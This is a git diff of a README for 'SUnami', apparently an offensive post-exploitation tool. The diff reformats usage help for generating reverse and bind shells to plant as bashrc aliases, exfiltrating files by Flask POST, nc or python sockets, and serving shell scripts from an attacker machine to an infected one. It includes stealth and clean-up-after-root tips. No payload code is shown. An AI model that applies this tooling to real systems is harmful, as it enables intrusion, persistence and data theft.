Updated README.md
parent
318b83ccbd
commit
2ddbf2bab5
58
README.md
58
README.md
|
@ -11,7 +11,7 @@
|
||||||
witchdocsec, TheA1ch3m1st
|
witchdocsec, TheA1ch3m1st
|
||||||
|
|
||||||
# Notice
|
# Notice
|
||||||
using the shells and socket based exfil will throw an error in the targets shell if your listener isn't active. be sure to clean up after gaining root. For the most stealth with file exfil we suggest the built in flask server. Currently our built in listener works best with bash shells. for nc shells using ncs own listener is recommended.
|
Using the shells and socket based exfil will throw an error in the targets shell if your listener isn't active. Be sure to clean up after gaining root. For the most stealth with file exfil, we suggest the built-in flask server. Currently our built in listener works best with bash shells. For nc shells using ncs own listener is recommended.
|
||||||
|
|
||||||
|
|
||||||
# File Exfiltration
|
# File Exfiltration
|
||||||
|
@ -28,28 +28,34 @@ I used passwd so as not to leak my hash for this demo but rest assured you can r
|
||||||
## Usage
|
## Usage
|
||||||
sunami.py [-local {1,0}] rfs [-h] --ip IP --port PORT --file FILE [--vars VARS [VARS ...]] [--schema SCHEMA]
|
sunami.py [-local {1,0}] rfs [-h] --ip IP --port PORT --file FILE [--vars VARS [VARS ...]] [--schema SCHEMA]
|
||||||
# Help
|
# Help
|
||||||
genshell generates the shell to be edited in the bashrc file as an alias
|
```
|
||||||
--ip ip to connect to
|
SUnami
|
||||||
--port port to connect to
|
|
||||||
--shelltype type of shell to use (reverse, bind) - default is reverse
|
help outputs this page
|
||||||
--shell type of shell to generate - default is bash
|
|
||||||
reverse bash, nc, nce
|
genshell generates the shell to be edited in the bashrc file as an alias
|
||||||
bind nc
|
--ip ip to connect to
|
||||||
-protocol type of protocol, will not affect most shells (tcp, udp) - default is tcp
|
--port port to connect to
|
||||||
-listen will automatically run a listener after outputting the shell (1, 0)
|
--shelltype type of shell to use (reverse, bind) - default is reverse
|
||||||
usage: sunami.py genshell [-h] [--ip IP] [--port PORT] [--shelltype SHELLTYPE] [--shell SHELL] [-protocol PROTOCOL] [-listen]
|
--shell type of shell to generate - default is bash
|
||||||
|
reverse bash, nc, nce
|
||||||
exfilfile exfiltrates files using several methods
|
bind nc
|
||||||
--file file to exfiltrate
|
-protocol type of protocol, will not affect most shells (tcp, udp) - default is tcp
|
||||||
--method method to use (postflask, nc, pysocket)
|
-listen will automatically run a listener after outputting the shell
|
||||||
--ip ip to send to
|
usage: sunami.py genshell [-h] [--ip IP] [--port PORT] [--shelltype SHELLTYPE] [--shell SHELL] [-protocol PROTOCOL] [-listen]
|
||||||
--port port to send to
|
|
||||||
usage: sunami.py exfilfile [-h] [--file FILE] [--method {postflask,nc,pysocket}] [--ip IP] [--port PORT]
|
exfilfile exfiltrates files using several methods
|
||||||
|
--file file to exfiltrate
|
||||||
rfs runs flask server serving your sh files to run from the attacker machine
|
--method method to use (postflask, nc, pysocket)
|
||||||
--ip ip to run server on
|
--ip ip to send to
|
||||||
--port port to run server on
|
--port port to send to
|
||||||
--file file to run on infected machine
|
usage: sunami.py exfilfile [-h] [--file FILE] [--method {postflask,nc,pysocket}] [--ip IP] [--port PORT]
|
||||||
--vars <key>:<value> - sets variables in the selected script using jinja2 template syntax - default is no variables
|
|
||||||
--schema schema to use (http, https) - default http
|
rfs runs flask server serving your sh files to run from the attacker machine
|
||||||
usage: sunami.py rfs [-h] --ip IP --port PORT --file FILE [--vars VARS [VARS ...]] [--schema SCHEMA]
|
--ip ip to run server on
|
||||||
|
--port port to run server on
|
||||||
|
--file file to run on infected machine
|
||||||
|
--vars <key>:<value> - sets variables in the selected script using jinja2 template syntax - default is no variables
|
||||||
|
--schema schema to use (http, https) - default http
|
||||||
|
useage: sunami.py rfs [-h] --ip IP --port PORT --file FILE [--vars VARS [VARS ...]] [--schema SCHEMA]
|
||||||
|
```
|
Loading…
Reference in New Issue